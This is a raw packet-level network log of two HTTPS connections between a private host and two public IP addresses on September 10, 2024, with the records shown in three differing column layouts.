Sep 10, 2024 16:33:41.842679977 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.842865944 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.843127012 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.843175888 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.843231916 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.843231916 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.843238115 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.843302965 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.844652891 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.844695091 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.844754934 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.844754934 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.844762087 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.844997883 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.879327059 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.879412889 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.879420996 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.879452944 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.879491091 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.879508972 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.937475920 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.937550068 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.937675953 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.937675953 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.937695026 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.937720060 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.937769890 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.937797070 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.937809944 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.937851906 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.937871933 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.938157082 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.938204050 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.938237906 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.938246012 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.938263893 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.938291073 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.938735008 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.938782930 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.938843966 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.938843966 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.938853025 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.939059019 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.940954924 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.941003084 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.941039085 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.941051006 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.941068888 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.941092968 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.941406965 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.941448927 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.941481113 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.941492081 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.941514015 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.941571951 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.941999912 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.942050934 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.942076921 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.942085981 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.942111015 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.942183971 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.943372011 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.965379000 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.965421915 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.965487003 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.965504885 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:41.965523958 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:41.965621948 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.023732901 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.023789883 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.023849010 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.023865938 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.023896933 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.023942947 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.024099112 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.024147987 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.024166107 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.024175882 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.024214983 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.024214983 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.024544954 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.024588108 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.024611950 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
Sep 10, 2024 16:33:42.024622917 CEST | 443 | 49718 | 8.39.147.104 | 192.168.2.6
Sep 10, 2024 16:33:42.024651051 CEST | 49718 | 443 | 192.168.2.6 | 8.39.147.104
                                                                                Sep 10, 2024 16:33:42.024718046 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.025049925 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.025091887 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.025124073 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.025132895 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.025154114 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.025193930 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.028954029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029000998 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029062986 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029076099 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029090881 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029179096 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029787064 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029830933 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029880047 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029886007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.029913902 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029974937 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.029985905 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030016899 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030055046 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.030066013 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030077934 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.030088902 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.030117035 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.030181885 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.054522038 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.054563046 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.054595947 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.054608107 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.054645061 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.054789066 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.109960079 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110030890 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110074043 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110096931 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110141039 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110244036 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110248089 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110277891 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110315084 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110317945 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110344887 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110363007 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110418081 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110443115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110729933 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110771894 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110829115 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110836029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.110843897 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.110908031 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.111254930 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.111294985 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.111372948 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.111373901 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.111388922 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.111458063 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113394022 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113444090 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113519907 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113519907 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113528013 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113650084 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113908052 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113955021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.113974094 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.113982916 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114031076 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.114507914 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114557981 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114605904 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.114613056 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.114649057 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.114676952 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.115628958 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.138477087 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.138504982 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.138560057 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.138569117 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.138657093 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196086884 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196147919 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196208000 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196216106 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196285963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196285963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196497917 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196543932 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196573019 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196588993 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.196641922 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196712971 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.196959972 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197011948 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197041988 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197057009 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197114944 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197114944 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197325945 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197367907 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197448969 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197448969 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.197458029 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.197583914 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.199549913 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.199594021 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.199620008 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.199635983 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.199682951 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.199899912 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200258017 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200305939 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200357914 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200366020 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200421095 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200421095 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200788975 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200831890 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200864077 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.200879097 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.200964928 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.201025963 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.225086927 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.225117922 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.225341082 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.225364923 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.225635052 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.282274008 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.282339096 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.282390118 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.282409906 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.282460928 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.282738924 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283149958 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283191919 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283246994 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283255100 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283288956 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283390045 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283646107 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283691883 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283715010 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.283721924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.283782959 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284107924 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284157038 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284236908 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284236908 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284245968 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284373045 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.284591913 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.284701109 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.295283079 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.295283079 CEST49718443192.168.2.68.39.147.104
                                                                                Sep 10, 2024 16:33:42.295315027 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:42.295325041 CEST443497188.39.147.104192.168.2.6
                                                                                Sep 10, 2024 16:33:47.107718945 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.107764959 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.107851982 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.116463900 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.116475105 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.624710083 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.624783039 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.626399040 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.626411915 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.626615047 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.632911921 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.675422907 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.771734953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.771755934 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.771919966 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.771945953 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.835648060 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.861128092 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861136913 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861176968 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861188889 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861203909 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.861217976 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.861252069 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.861268044 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.863241911 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.863256931 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.863307953 CEST49733443192.168.2.679.141.161.172
                                                                                Sep 10, 2024 16:33:47.863317013 CEST4434973379.141.161.172192.168.2.6
                                                                                Sep 10, 2024 16:33:47.863356113 CEST49733443192.168.2.679.141.161.172
Sep 10, 2024 16:33:47.947916985 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.947938919 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.947999001 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.948034048 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.948054075 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.948081970 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.949089050 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.949105024 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.949155092 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.949162960 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.949187994 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.949199915 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.950954914 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.950969934 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.951025009 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.951031923 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.951064110 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.951064110 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.951869011 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.951884985 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.951939106 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.951946020 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:47.951968908 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:47.951982975 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.034766912 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.034787893 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.035053968 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.035087109 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.035602093 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.035620928 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.035700083 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.035700083 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.035711050 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.036107063 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.037642002 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.037655115 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.037730932 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.037730932 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.037739038 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.037780046 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.039042950 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.039057970 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.039096117 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.039132118 CEST  49733  443    192.168.2.6     79.141.161.172
Sep 10, 2024 16:33:48.039135933 CEST  443    49733  79.141.161.172  192.168.2.6
Sep 10, 2024 16:33:48.039149046 CEST  443    49733  79.141.161.172  192.168.2.6
